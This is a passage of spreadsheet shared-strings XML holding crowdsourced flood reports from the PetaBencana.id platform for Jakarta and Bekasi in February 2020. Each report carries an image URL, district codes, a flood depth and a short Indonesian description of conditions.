    <t>https://images.petabencana.id/399b2731-a218-4530-b263-4ba338ecc3f3.jpg</t>
  </si>
  <si>
    <t>Baniir dimulai pukul 3.15 WIB dini hari, foto diambil pukul 6.53 WIB</t>
  </si>
  <si>
    <t>8dfeda65-293a-4286-81f9-f87aae9af370</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1356", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hanya bs lewat jalur busway</t>
  </si>
  <si>
    <t>b79c322e-6449-4a0a-874c-f82572c9d7d3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b79c322e-6449-4a0a-874c-f82572c9d7d3.jpg</t>
  </si>
  <si>
    <t>Gg. Lembang Rt. 10 Rw. 01, Sukapura, Cilincing</t>
  </si>
  <si>
    <t>6c722926-3cea-40cc-8fa7-228a5b0ec77c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c722926-3cea-40cc-8fa7-228a5b0ec77c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "587", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air kali juga tinggi.</t>
  </si>
  <si>
    <t>1aa2a081-993e-4b02-a945-233354c9152e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1aa2a081-993e-4b02-a945-233354c9152e.jpg</t>
  </si>
  <si>
    <t>Banjir asem I dan duri intan</t>
  </si>
  <si>
    <t>4913e815-a6f8-45e2-bb63-8afe4e184c31</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4913e815-a6f8-45e2-bb63-8afe4e184c31.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1503", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir luapan sungai depan kampus URINDO</t>
  </si>
  <si>
    <t>f5f4ea54-ff2a-44cb-a60a-a17a59287c58</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f5f4ea54-ff2a-44cb-a60a-a17a59287c58.jpg</t>
  </si>
  <si>
    <t>Banjir 22 Feb</t>
  </si>
  <si>
    <t>d605ff46-a8a0-4355-8941-760eb92d549b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d605ff46-a8a0-4355-8941-760eb92d549b.jpg</t>
  </si>
  <si>
    <t>Jalan Chandra 4, Perumahan Chandra Indah Lama, RT01/RW16, Kel. Jatirahayu, Kec. Pondok Melati, Kota Bekasi.</t>
  </si>
  <si>
    <t>Jatirahayu</t>
  </si>
  <si>
    <t>99f193bc-1ed0-46c1-a78c-784044229e73</t>
  </si>
  <si>
    <t>https://images.petabencana.id/99f193bc-1ed0-46c1-a78c-784044229e73.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2549", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pademangan VII kali sudah meluap, pembatas kali dengan jalanan sudah tidak terlihat</t>
  </si>
  <si>
    <t>06726eee-9165-4665-bc62-ccefd8dcec4c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06726eee-9165-4665-bc62-ccefd8dcec4c.jpg</t>
  </si>
  <si>
    <t>44821528-e1e4-43ff-a19c-4748b53bb84a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/44821528-e1e4-43ff-a19c-4748b53bb84a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1706", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir masuk rumah dalam</t>
  </si>
  <si>
    <t>78ba55e1-1ebb-4d7c-b3fd-2f68c148681d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/78ba55e1-1ebb-4d7c-b3fd-2f68c148681d.jpg</t>
  </si>
  <si>
    <t>banjr depan ropang otewe grand galaxy city bekasi mulai surut</t>
  </si>
  <si>
    <t>49ee4f11-488e-46f7-9a7e-0862235a391d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/49ee4f11-488e-46f7-9a7e-0862235a391d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "422", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir masuk rumah warga</t>
  </si>
  <si>
    <t>Krendang</t>
  </si>
  <si>
    <t>48a9e3a5-58e4-40de-8433-6143f0212f4d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/48a9e3a5-58e4-40de-8433-6143f0212f4d.jpg</t>
  </si>
  <si>
    <t>Kavling PGRI Bekasi Utara, lokasi yang di pinggir kali lebih tinggi lagi airnya sekitar sepaha orang dewasa</t>
  </si>
  <si>
    <t>939c612d-4c6b-4748-b20f-d3b342a39b34</t>
  </si>
  <si>
    <t>7454256b-0794-4db5-a554-94ef6579623b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7454256b-0794-4db5-a554-94ef6579623b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2352", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir 30-50 cm semper barat</t>
  </si>
  <si>
    <t>60b29b5f-4431-4a4d-a0ec-a2ef75cc32fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/60b29b5f-4431-4a4d-a0ec-a2ef75cc32fc.jpg</t>
  </si>
  <si>
    <t>Banjir besar yang ke 2 di tahun 2020, kondisinya hampir sama dengan awal tahun kemarin.</t>
  </si>
  <si>
    <t>33b23350-27b1-400c-8095-b7cbb22e222c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/33b23350-27b1-400c-8095-b7cbb22e222c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2196", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sebetis. Perumahan Gading Pandawa, Kelapa Gading Timur, Kelapa Gading</t>
  </si>
  <si>
    <t>d885e2a2-04ae-4f48-9c58-7c30415cb756</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d885e2a2-04ae-4f48-9c58-7c30415cb756.jpg</t>
  </si>
  <si>
    <t>Summarecon Bekasi</t>
  </si>
  <si>
    <t>ac660bca-92e0-4e08-a5d2-e83c469b2f46</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ac660bca-92e0-4e08-a5d2-e83c469b2f46.jpg</t>
  </si>
  <si>
    <t>Susah keluar komplek</t>
  </si>
  <si>
    <t>bd4e48d8-e6eb-4775-9df5-1561d6582e89</t>
  </si>
  <si>
    <t>Banjir sudah setinggi paha</t>
  </si>
  <si>
    <t>976031f7-27d0-4d49-9bdf-ccda50ee4047</t>
  </si>
  <si>
    <t>https://images.petabencana.id/976031f7-27d0-4d49-9bdf-ccda50ee4047.jpg</t>
  </si>
  <si>
    <t>85b75a08-608d-470b-a29f-7d11b42c09e5</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2583", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masih semata kaki</t>
  </si>
  <si>
    <t>70a77f07-4771-4990-8681-8805fc7e4719</t>
  </si>
  <si>
    <t>https://images.petabencana.id/70a77f07-4771-4990-8681-8805fc7e4719.jpg</t>
  </si>
  <si>
    <t>Harapan Baru, Bekasi Barat</t>
  </si>
  <si>
    <t>c73d0f84-7153-4fc6-bd41-4e0587791d1d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c73d0f84-7153-4fc6-bd41-4e0587791d1d.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 129 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1184", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir sedada orang dewasa</t>
  </si>
  <si>
    <t>6c4cf4a9-2136-4daa-bfbd-7217798b4936</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c4cf4a9-2136-4daa-bfbd-7217798b4936.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1012", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan ditutup banjir</t>
  </si>
  <si>
    <t>Pulo</t>
  </si>
  <si>
    <t>d53b6ea8-55e6-4ca6-b4d7-38bad97bb71f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d53b6ea8-55e6-4ca6-b4d7-38bad97bb71f.jpg</t>
  </si>
  <si>
    <t>b4cec572-aed6-4dff-be88-0c15fc982af6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4cec572-aed6-4dff-be88-0c15fc982af6.jpg</t>
  </si>
  <si>
    <t>Banjir jalan ditutup - jam 0705</t>
  </si>
  <si>
    <t>f408a285-cb2d-4c1f-826e-59bc19328480</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f408a285-cb2d-4c1f-826e-59bc19328480.jpg</t>
  </si>
  <si>
    <t>Kav. DKI Jl. Lembah Aren X</t>
  </si>
  <si>
    <t>fd98700c-713c-46be-9182-74e4ac30b0a5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fd98700c-713c-46be-9182-74e4ac30b0a5.jpg</t>
  </si>
  <si>
    <t>Pertigaan jalan pulo sirih dan pulo ribung, area terdekat psr pulo banjir setinggi lutut org dewasa</t>
  </si>
  <si>
    <t>648a7b1f-f6b3-4118-8292-078d8c011b1c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/648a7b1f-f6b3-4118-8292-078d8c011b1c.jpg</t>
  </si>
  <si>
    <t>Perumahan Chandra Indah Lama, Blok D, Kelurahan Jatirahayu, Kec. Pondok Melati Kota Bekasi, 17414.</t>
  </si>
  <si>
    <t>aad7a42b-067b-4907-910c-920f9349e923</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aad7a42b-067b-4907-910c-920f9349e923.jpg</t>
  </si>
  <si>
    <t>Ada pohon tumbang</t>
  </si>
  <si>
    <t>ef32fb63-fd90-416b-9bc7-4b0363709604</t>
  </si>
  <si>
    <t>Hanya bisa dilewati mobil yang tinggi, alternatifnya jalan sebelahnya jadi 2 arah</t>
  </si>
  <si>
    <t>1104f3c3-8303-45e7-835f-7a2ec189e4e7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1104f3c3-8303-45e7-835f-7a2ec189e4e7.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 40, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Hanyut hanyutttt gaisss</t>
  </si>
  <si>
    <t>a3779bc9-456c-4d54-ab21-d030ad20a0df</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3779bc9-456c-4d54-ab21-d030ad20a0df.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2402", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Petogogan</t>
  </si>
  <si>
    <t>dbea1498-fe1c-4b85-a11b-6683e86710a9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dbea1498-fe1c-4b85-a11b-6683e86710a9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1533", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Bulan kemarin sempat dilakukan pendataan ke warga yg terkena banjir,dengan cara penarikan Photocopy KK. Terbukti tdk ada tindak lanjut.</t>
  </si>
  <si>
    <t>339dcdec-7f65-40e0-821a-5557568a2dae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/339dcdec-7f65-40e0-821a-5557568a2dae.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 40, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Sepanjang medan merdeka barat hari ini dibuka wahana air baru. Mungkin biar pekerja2 di sana bahagia #positivethinking</t>
  </si>
  <si>
    <t>52abd156-d2ee-453b-81c6-c5c8baefc62c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/52abd156-d2ee-453b-81c6-c5c8baefc62c.jpg</t>
  </si>
  <si>
    <t>Banjir di perempatan galaxy</t>
  </si>
  <si>
    <t>e4005487-1632-41ac-8eff-25970c8a3f51</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e4005487-1632-41ac-8eff-25970c8a3f51.jpg</t>
  </si>
  <si>
    <t>Jembatan portal, macet</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349521</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/25/15825888531470759152.jpg</t>
  </si>
  <si>
    <t>Kondisi Jl Bintara Jaya Arah Pondok Kopi Tergenang Air 20 Cm</t>
  </si>
  <si>
    <t>Jalan Bintara jaya Arah Pondok Kopi Tergenang Air Setinggi 20cm</t>
  </si>
  <si>
    <t>1bd8ab47-f199-4c19-9871-08b89f00d8cd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1bd8ab47-f199-4c19-9871-08b89f00d8cd.jpg</t>
  </si>
  <si>
    <t>Banjir di kec. Tambora Jakarta barat</t>
  </si>
  <si>
    <t>1238f2ae-3992-49d4-8542-9bbb070d8445</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1238f2ae-3992-49d4-8542-9bbb070d8445.jpg</t>
  </si>
  <si>
    <t>Banjir selutut di daerah latumenten jelambar jakarta barat</t>
  </si>
  <si>
    <t>0a4f1b1d-9a24-4531-8d66-266d8e0efa52</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0a4f1b1d-9a24-4531-8d66-266d8e0efa52.jpg</t>
  </si>
  <si>
    <t>RT 11 RW Bekasi Jaya Bekasi Timur 134 KK terdampak banjir.Listrik Mati..</t>
  </si>
  <si>
    <t>93afaabe-b2a3-427b-b017-6ade76e0d9a7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93afaabe-b2a3-427b-b017-6ade76e0d9a7.jpg</t>
  </si>
  <si>
    <t>544b32d9-f53d-495a-b115-bdb0b9ca1d3a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/544b32d9-f53d-495a-b115-bdb0b9ca1d3a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "623", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir selutut orang dewasa, di dalam rumah lebih dalam</t>
  </si>
  <si>
    <t>da0bd240-090b-4598-8c28-3b97a3811f27</t>
  </si>
  <si>
    <t>https://images.petabencana.id/da0bd240-090b-4598-8c28-3b97a3811f27.jpg</t>
  </si>
  <si>
    <t>Banjir parah wilayah jalan bekasi timur v</t>
  </si>
  <si>
    <t>ece2fff5-13f3-43ef-a140-b51caeac8294</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ece2fff5-13f3-43ef-a140-b51caeac8294.jpg</t>
  </si>
  <si>
    <t>Jalan Bazoka Raya akses menuju kompleks Puri Beta I air setinggi lutut orang dewasa</t>
  </si>
  <si>
    <t>441e19bb-e45f-414d-8fb9-1ec10a50a744</t>
  </si>
  <si>
    <t>https://images.petabencana.id/441e19bb-e45f-414d-8fb9-1ec10a50a744.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2540", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>2c1d4529-fe35-42b5-845f-0307ecf2f0a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2c1d4529-fe35-42b5-845f-0307ecf2f0a0.jpg</t>
  </si>
  <si>
    <t>BANJIR SATRIA JELAMBAR #BANJIRKEMBALI #BANJIR</t>
  </si>
  <si>
    <t>67f563d1-f119-43fb-bc11-5eeda0220a2a</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "287", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan air sudah mulai terlihat di jalan</t>
  </si>
  <si>
    <t>Glodok</t>
  </si>
  <si>
    <t>6fab9a67-c042-4a51-890c-c24f87953581</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6fab9a67-c042-4a51-890c-c24f87953581.jpg</t>
  </si>
  <si>
    <t>0a26db7f-a894-4ba3-9042-4c11bae0ad4f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0a26db7f-a894-4ba3-9042-4c11bae0ad4f.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan pemuda 1, universitas ibnu chaldun</t>
  </si>
  <si>
    <t>5faddb41-b909-431d-b19e-18de19a27475</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5faddb41-b909-431d-b19e-18de19a27475.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 20, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "743", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan di depan UI Salemba</t>
  </si>
  <si>
    <t>Kenari</t>
  </si>
  <si>
    <t>a70733de-7456-4da4-8bc3-076d9a9a9112</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 26, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2581", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Grogol</t>
  </si>
  <si>
    <t>0a7ca016-7d4e-43c6-9c45-8636577af9c5</t>
  </si>
  <si>
    <t>Banjir semata kaki</t>
  </si>
  <si>
    <t>Teluk Pucung</t>
  </si>
  <si>
    <t>7067ae14-d842-4db5-a3b9-18ec599caeb4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7067ae14-d842-4db5-a3b9-18ec599caeb4.jpg</t>
  </si>
  <si>
    <t>Perumahan royal residence cikunir</t>
  </si>
  <si>
    <t>06da5ab2-f9af-4ed7-970e-76bc1108571f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06da5ab2-f9af-4ed7-970e-76bc1108571f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1468", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>58a4d438-140a-4464-87b7-97d9f553aaa8</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "160", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir pas dibelokan sebelum tanjakan jl adam</t>
  </si>
  <si>
    <t>Sukabumi Utara</t>
  </si>
  <si>
    <t>82365753-1c6d-40c9-bc1c-57f16d4391db</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82365753-1c6d-40c9-bc1c-57f16d4391db.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "309", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Krukut - kejayaan banjir</t>
  </si>
  <si>
    <t>8deaf5d2-33e4-42fb-a0c4-efc9d7c72cde</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8deaf5d2-33e4-42fb-a0c4-efc9d7c72cde.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1031", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan 50cm</t>
  </si>
  <si>
    <t>Senayan</t>
  </si>
  <si>
    <t>bd7e747f-f0c5-4aed-b2b4-dd48390d4ea0</t>
  </si>
  <si>
    <t>50072448-6abf-43b1-9be0-20aeedab80e2</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 27, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1343", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di jalan perintis Kuningan timur</t>
  </si>
  <si>
    <t>45a2083f-cdea-4955-bfc5-9e53efeb8768</t>
  </si>
  <si>
    <t>https://images.petabencana.id/45a2083f-cdea-4955-bfc5-9e53efeb8768.jpg</t>
  </si>
  <si>
    <t>Banjir kelapa gading episode 4</t>
  </si>
  <si>
    <t>4135770e-7870-4dd7-803d-baefb69c5bf7</t>
  </si>
  <si>
    <t>Banjir perumahan puri nusaphala, jatiasih</t>
  </si>
  <si>
    <t>Jatisari</t>
  </si>
  <si>
    <t>0dc413fc-ddfa-4f40-a33f-3298f8e9feea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0dc413fc-ddfa-4f40-a33f-3298f8e9feea.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi 20 - 25 cm, Jalan Pulau Selayar 1, Perumahan Taman Permata Buana, Kembangan Utara, Jakarta Barat</t>
  </si>
  <si>
    <t>85e37914-488d-4cd1-9d6c-3f625186a9b0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/85e37914-488d-4cd1-9d6c-3f625186a9b0.jpg</t>
  </si>
  <si>
    <t>Jelambar barat 2 h</t>
  </si>
  <si>
    <t>71e6bcd3-f09a-4f4b-b3ed-6e81df3d9a7c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/71e6bcd3-f09a-4f4b-b3ed-6e81df3d9a7c.jpg</t>
  </si>
  <si>
    <t>Banjir di daerah Klingkit RT05/RW12, Rawa Buaya, Cengkareng, Jakarta Barat. Sudah mulai banjir Selasa jam 5 pagi</t>
  </si>
  <si>
    <t>6b33fe44-57eb-4805-b6d0-0a3a0ff7e596</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6b33fe44-57eb-4805-b6d0-0a3a0ff7e596.jpg</t>
  </si>
  <si>
    <t>c2ba87ff-0dc7-4541-b9b6-390a6efff433</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c2ba87ff-0dc7-4541-b9b6-390a6efff433.jpg</t>
  </si>
  <si>
    <t>3264ed6f-8f95-4bef-986f-93f34eaa2940</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3264ed6f-8f95-4bef-986f-93f34eaa2940.jpg</t>
  </si>
  <si>
    <t>Akses depan metro tv, kedoya selatan</t>
  </si>
  <si>
    <t>9659116a-eb85-46c5-bf0f-ee4445bc07f8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9659116a-eb85-46c5-bf0f-ee4445bc07f8.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 75, "report_type": "flood" }</t>
  </si>
  <si>
    <t>#banjir air masuk dalam rumah lebih 1 lutut dan masih hujan di Taman Malaka Selatan 3B</t>
  </si>
  <si>
    <t>bcb4f81c-2332-459e-9bc8-a63f56a9037f</t>
  </si>
  <si>
    <t>Selutut ketinggian banjir.. arah meruya dari jalan panjang</t>
  </si>
  <si>
    <t>31828400-87da-415d-aa8c-82e05b1d074e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31828400-87da-415d-aa8c-82e05b1d074e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1848", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>873655cd-c458-4532-a066-a4db83add96e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/873655cd-c458-4532-a066-a4db83add96e.jpg</t>
  </si>
  <si>
    <t>Pondok sani banjir sekitar 90 cm di jalan</t>
  </si>
  <si>
    <t>61802492-481f-40b6-bdde-3879715222aa</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 42, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di Jakarta karet sawah belakang rumah sakit Siloam Semanggi</t>
  </si>
  <si>
    <t>a104524c-5fbc-40e1-ab95-92bdb15196a1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a104524c-5fbc-40e1-ab95-92bdb15196a1.jpg</t>
  </si>
  <si>
    <t>9449063c-9b2d-4726-94c0-736a0773b6b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9449063c-9b2d-4726-94c0-736a0773b6b2.jpg</t>
  </si>
  <si>
    <t>Banjir jl layur</t>
  </si>
  <si>
    <t>63a86a47-ec79-45ac-8b7e-bece96d4f81f</t>
  </si>
  <si>
    <t>banjir di jalan imam bonjol, motor banyak yg mogok dan menyebabkan kemacetan</t>
  </si>
  <si>
    <t>5bb1ca80-4458-43c6-8f0e-ea5bb5337259</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5bb1ca80-4458-43c6-8f0e-ea5bb5337259.jpg</t>
  </si>
  <si>
    <t>Kondisi saat ini di Tangerang, tepatnya Jl.inpres 6 , gg.sumur mangga I , Kec.Larangan Kel.Gaga, Ciledug</t>
  </si>
  <si>
    <t>Gaga</t>
  </si>
  <si>
    <t>5e125a95-6c94-49f3-b655-c86dd600393f</t>
  </si>
  <si>
    <t>Depan resto WANG DINASTY taman ratu</t>
  </si>
  <si>
    <t>7c30f692-979b-4c12-9eee-bb7f1c082a2c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c30f692-979b-4c12-9eee-bb7f1c082a2c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2465", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir muara baru, penjaringan</t>
  </si>
  <si>
    <t>c0bcd19d-d83c-477d-a76b-8ae7f6097d9b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c0bcd19d-d83c-477d-a76b-8ae7f6097d9b.jpg</t>
  </si>
  <si>
    <t>Keadaan Jalan Taruma Indah, Rawa Buaya, Cengkareng, Jakarta Barat pagi hari Selasa 25 Februari 2020. Air setinggi setengah roda</t>
  </si>
  <si>
    <t>80f7ed42-868c-4269-9b85-9f770a3310d6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/80f7ed42-868c-4269-9b85-9f770a3310d6.jpg</t>
  </si>
  <si>
    <t>Pamanukan</t>
  </si>
  <si>
    <t>Subang</t>
  </si>
  <si>
    <t>7bfde4e4-6f2a-4d3e-8572-aea9d6ac8cb1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7bfde4e4-6f2a-4d3e-8572-aea9d6ac8cb1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "579", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>4d1aa6b0-95be-49ee-a06b-e4caa456bba9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d1aa6b0-95be-49ee-a06b-e4caa456bba9.jpg</t>
  </si>
  <si>
    <t>Banjir dari jam 3 pagi di Perumahan Wisma Tajur, Ciledug.</t>
  </si>
  <si>
    <t>db4c911d-f888-43e4-8af2-ab3ecd06dfd2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/db4c911d-f888-43e4-8af2-ab3ecd06dfd2.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 82 }</t>
  </si>
  <si>
    <t>Banjir daerah pondok jaya, mampang prapatan</t>
  </si>
  <si>
    <t>156bb277-3d2c-4520-a195-85c2fc15af73</t>
  </si>
  <si>
    <t>sebagian rumah lebih rendah dari jalan</t>
  </si>
  <si>
    <t>4a9eb02e-2254-434d-a388-3731ad65ec88</t>
  </si>
  <si>
    <t>Intensitas hujan mulai menurun.</t>
  </si>
  <si>
    <t>89f05295-f36c-47e3-9083-27a6444892a9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/89f05295-f36c-47e3-9083-27a6444892a9.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 60, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "31", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lorong Tol Arjuna</t>
  </si>
  <si>
    <t>08658666-5b4d-43b9-a268-bb9cb63e7f48</t>
  </si>
  <si>
    <t>https://images.petabencana.id/08658666-5b4d-43b9-a268-bb9cb63e7f48.jpg</t>
  </si>
  <si>
    <t>Perumahan pondok surya mandala banjir dari pukul 02.00 dini hari</t>
  </si>
  <si>
    <t>1b3d8bf3-5870-4e6f-9c88-aedf0be5757d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1b3d8bf3-5870-4e6f-9c88-aedf0be5757d.jpg</t>
  </si>
  <si>
    <t>b0f2d935-91b0-4f23-9008-02c34f6a31ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b0f2d935-91b0-4f23-9008-02c34f6a31ea.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1052", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Penegak banjir se betis, ada yg bagian selutut orang dewasa</t>
  </si>
  <si>
    <t>b7220ffe-a550-489d-8351-d6a10bb7f696</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7220ffe-a550-489d-8351-d6a10bb7f696.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2445", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Muara karang blok 4, pluit karang jelita 9. Banjir masuk rumah</t>
  </si>
  <si>
    <t>6938effd-989e-4cfd-9354-5b0fb9d23126</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6938effd-989e-4cfd-9354-5b0fb9d23126.jpg</t>
  </si>
  <si>
    <t>banjir sedengkul. motor banyak mogok</t>
  </si>
  <si>
    <t>776a4367-c49d-4beb-9ad5-6c37a6957f08</t>
  </si>
  <si>
    <t>https://images.petabencana.id/776a4367-c49d-4beb-9ad5-6c37a6957f08.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1938", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jalan udah pada ditutup</t>
  </si>
  <si>
    <t>94ecf4c5-236c-4d1a-804f-043e6cafaae9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/94ecf4c5-236c-4d1a-804f-043e6cafaae9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1765", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>329aed4e-84b9-402f-9d6d-7a8af97e3077</t>
  </si>
  <si>
    <t>https://images.petabencana.id/329aed4e-84b9-402f-9d6d-7a8af97e3077.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 58, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di daerah D.i panjaitan depan park hotel dan apartmen patria park.</t>
  </si>
  <si>
    <t>4d88bd53-e54d-4ab5-87f9-3e3903a0a4b1</t>
